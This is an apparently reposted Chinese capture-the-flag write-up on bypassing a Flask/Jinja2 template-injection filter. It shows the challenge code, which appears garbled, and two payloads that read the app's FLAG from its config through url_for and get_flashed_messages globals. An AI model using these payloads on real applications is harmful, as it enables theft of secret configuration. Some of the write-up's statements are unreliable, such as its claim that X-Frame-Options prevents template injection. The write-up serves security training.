博客
关于我
2021-02-08
阅读量:297 次
发布时间:2019-03-01

本文共 1609 字,大约阅读时间需要 5 分钟。

如何通过Flask模板注入绕过过滤并获取FLAG

在Flask应用中,模板注入是一种常见的安全问题,特别是在模板引擎支持代码执行的情况下。以下是如何通过Flask模板注入绕过过滤并获取FLAG的一种方法。

1. 代码分析

首先,我们来看提供的Flask代码:

import flaskimport osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')@app.route('/')def index():    return open(__file__).read()@app.route('/shrine/
')def shrine(shrine): def safe_jinja(s): s = s.replace('(', '').replace(')', '') blacklist = ['config', 'self'] return ''.join(['{ {% set {}=None%}}'.format(c) for c in blacklist]) + s return flask.render_template_string(safe_jinja(shrine))

2. 过滤机制

代码中定义了safe_jinja函数用于过滤输入。该函数执行以下操作:

  • 替换所有括号()为空。
  • 定义一个黑名单['config', 'self']
  • 将黑名单中的每个关键字替换为空,例如{% set config=None %}
  • 3. 绕过过滤

    尽管safe_jinja函数进行了过滤,但仍然存在多种方法绕过其保护措施。以下是一些常见的绕过方法:

    方法一:利用url_for获取全局变量

    Flask模板引擎支持url_for函数,该函数可以用来生成URL,并接受参数以获取全局变量。例如:

    {{ url_for.__globals__['current_app'].config.FLAG }}

    通过这种方式,可以直接访问Flask应用的current_app对象,并从中获取配置信息,包括FLAG

    方法二:利用get_flashed_messages获取闪现信息

    get_flashed_messages函数用于获取Flask中通过flash()方法传递的闪现信息。例如:

    {{ get_flashed_messages.__globals__['current_app'].config.FLAG }}

    闪现信息可以包含我们想要获取的内容,包括FLAG

    4. 示例

    假设我们想要获取FLAG,可以构造以下模板:

    /shrine/{{ url_for.__globals__['current_app'].config.FLAG }}

    或者

    /shrine/{{ get_flashed_messages.__globals__['current_app'].config.FLAG }}

    5. 注意事项

    • 模板注入:这种方法依赖于模板引擎对变量解析的能力。如果模板引擎被禁用或限制,可能无法实现。
    • 过滤机制:即使进行了过滤,仍然可以通过url_forget_flashed_messages等函数绕过某些限制。
    • 安全性:Flask提供了一些安全功能,如模板过滤和X-Frame-Options,用于防止模板注入。建议结合这些功能进行全面安全性评估。

    6. 总结

    通过Flask模板注入,虽然safe_jinja函数进行了过滤,但仍然存在绕过保护措施的方法,例如利用url_forget_flashed_messages获取全局变量和闪现信息。因此,建议在Flask应用中谨慎使用模板注入,并结合其他安全措施来防止潜在的安全漏洞。

    转载地址:http://kelx.baihongyu.com/

    你可能感兴趣的文章
    PoE三种标准:标准 PoE、PoE+、PoE++,网络工程师必知!
    查看>>
    POI 的使用
    查看>>
    poi 读取单元格为null者空字符串
    查看>>
    poi-tl简介与文本/表格和图片渲染
    查看>>
    pointnet分割自己的点云数据_PointNet解析
    查看>>
    POI实现Excel导入Cannot get a text value from a numeric cell
    查看>>
    POI实现Excel导入时提示NoSuchMethodError: org.apache.poi.util.POILogger.log
    查看>>
    POI实现Excel导出时常用方法说明
    查看>>
    POI导出Excel2003
    查看>>
    POI数据获取及坐标纠偏
    查看>>
    Quartz入门看这一篇文章就够了
    查看>>
    POI解析Excel【poi的坑——空行处理】
    查看>>
    POI:POI+JXL实现xls文件添加水印
    查看>>
    POI:POI实现docx文件添加水印
    查看>>
    POJ 1006
    查看>>
    Quartz中时间表达式的设置-----corn表达式
    查看>>
    poj 1035
    查看>>
    POJ 1061 青蛙的约会 (扩展欧几里得)
    查看>>
    Quartz2.2.1简单使用
    查看>>
    POJ 1080 Human Gene Functions(DP:LCS)
    查看>>